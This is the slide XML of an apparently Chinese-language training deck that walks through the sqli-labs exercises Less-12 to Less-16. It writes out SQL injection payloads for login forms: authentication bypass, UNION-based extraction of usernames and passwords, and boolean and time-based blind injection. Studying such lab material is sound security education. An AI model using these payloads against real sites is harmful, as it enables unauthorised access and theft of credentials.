              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=admin“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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时有回显，显示有报错信息，通过报错信息，我们知道如何进行构造：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uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=admin“) or 1=1#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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时构造成功之后，显示登陆成功。接下来的和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>less-11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相同。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uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=admin“) order by 3#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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句得到一共有两列。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a&amp;passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a") union select database(),2  # &amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询到当前的数据库为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，或者是使用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a") union select database(),2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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>均可以查询到当前的数据库，当然也可以查询其它信息。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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a") union select 1,(select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1,1)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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以查询到当前的第一个数据库，或者是使用命令：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a") union select 1,(select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schema_name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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以得到所有的数据库。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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a") union select 1,(select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table_name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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库中的所有的表信息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8368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Less-12_02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498764"/>
            <a:ext cx="11762509" cy="6151417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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a") union select 1,(select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column_name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=0x7573657273)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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表获得里面的列值：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>id,username,password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=a“) union select 1,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concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(0x7e,username,password))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 #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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时就可以得到里面所有的数据。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x7e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代表的就是  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>~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153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Less-13_01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4" y="1163782"/>
            <a:ext cx="11762509" cy="6151417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uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=admin &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>admin&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=Submit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时只是显示登陆成功，但是不会显示其他的信息。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uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=‘ &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>a&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=Submit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接通过报错信息知道了如何构造   构造：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1’) or 1=1#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uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=admin‘) order by 2# &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>admin&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=Submit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时只是显示登陆成功，但是不会显示其他信息，考虑盲注。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uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=admin‘) or if(length(database())=8,1,sleep(5))# &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>admin&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时可以得到数据库的长度是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8.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ain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>‘) or left(database(),1)&gt;’a‘#&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>left()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来判断第一个字母是多少</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注意的是这里不是使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and)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ain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>‘) or left(database(),2)=’se‘#&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过这样一个个进行判断即可！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ain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>‘) or left((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>schema_name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0,1),1)&gt;’a‘#&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者是使用这种方法也是可以判断的。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786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Less-13_02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4" y="1163782"/>
            <a:ext cx="11762509" cy="6151417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ain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>‘) or left((select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limit 0,1),1)=’e‘#&amp;submit=Submit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查表，也可使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行辅助测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>本次并不使用脚本进行测试，后续会进行专门的脚本讲解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3060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4" y="1163782"/>
            <a:ext cx="11762509" cy="6151417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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>首先在代码中加入两行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:  echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;              echo "&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.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a“&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=Submit   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>构造：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" or 1=1#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2.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=a“ order by 10#&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断一共有多少列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=a“ or if(length(database())=8,1,sleep(5))# #&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>less-13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同样的方法进行判断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91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600364"/>
            <a:ext cx="11762509" cy="5834303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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>首先在代码中加入两行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:  echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;              echo "&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.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a“&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=Submit    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>构造：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1‘ or 1=1#   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在这里判断列数没有实际意义了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' or if(length(database())&gt;1000,1,sleep(5))#&amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过这个来判断其长度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' or if(length()&gt;1000,1,sleep(5))#&amp;submit=Submit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‘ or left((select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=’security‘ limit 0,1),1)&gt;’a‘#&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>less-13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相同的方法进行判断，就可以判断出当前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>库的第一个表的第一个字母是否大于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‘ or left((select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=’users‘ limit 0,1),1)&gt;’g‘#&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过同样的方法可以判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表中的字段数据是否大于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‘ or left((select username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0,1),1)&gt; ’a‘#&amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过这个来判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>security.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下第一个字段的第一位，在这里不能直接使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>username,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来一起查询，需要一个个进行查询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781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37302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Sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>phpstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下载和安装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下载：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/Audi-1/sqli-labs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>phpstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下载地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://down.php.cn/PhpStudy20180211.zip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-labs: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>db-creds.inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>账号密码！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2935229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600364"/>
            <a:ext cx="11762509" cy="5834303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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>首先在代码中加入两行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:  echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;              echo "&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.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a“&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=Submit    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>构造：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1”)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 or 1=1#   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在这里判断列数没有实际意义了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>less-15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相同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") or if(length(database())&gt;1,1,sleep(5))#&amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过这个来判断其长度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”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or if(length()&gt;1000,1,sleep(5))#&amp;submit=Submit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”) or left((select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=’security‘ limit 0,1),1)&gt;’a‘#&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>less-13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相同的方法进行判断，就可以判断出当前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>库的第一个表的第一个字母是否大于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”) or left((select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=’users‘ limit 0,1),1)&gt;’g‘#&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过同样的方法可以判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表中的字段数据是否大于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adminadmin&amp;passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>admiand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”) or left((select username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0,1),1)&gt; ’a‘#&amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过这个来判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>security.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下第一个字段的第一位，在这里不能直接使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>username,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来一起查询，需要一个个进行查询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6014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71437-EBCE-4757-A971-66F879F7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23806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补充知识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7F5AC-F388-4D77-BDBC-0AEF38BA9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1" y="900289"/>
            <a:ext cx="11065932" cy="5699066"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参考资料：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.jb51.net/article/125599.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.jb51.net/article/125607.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UPDATEXML (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>XML_document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>XPath_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>new_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第一个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>XML_document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>格式，为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
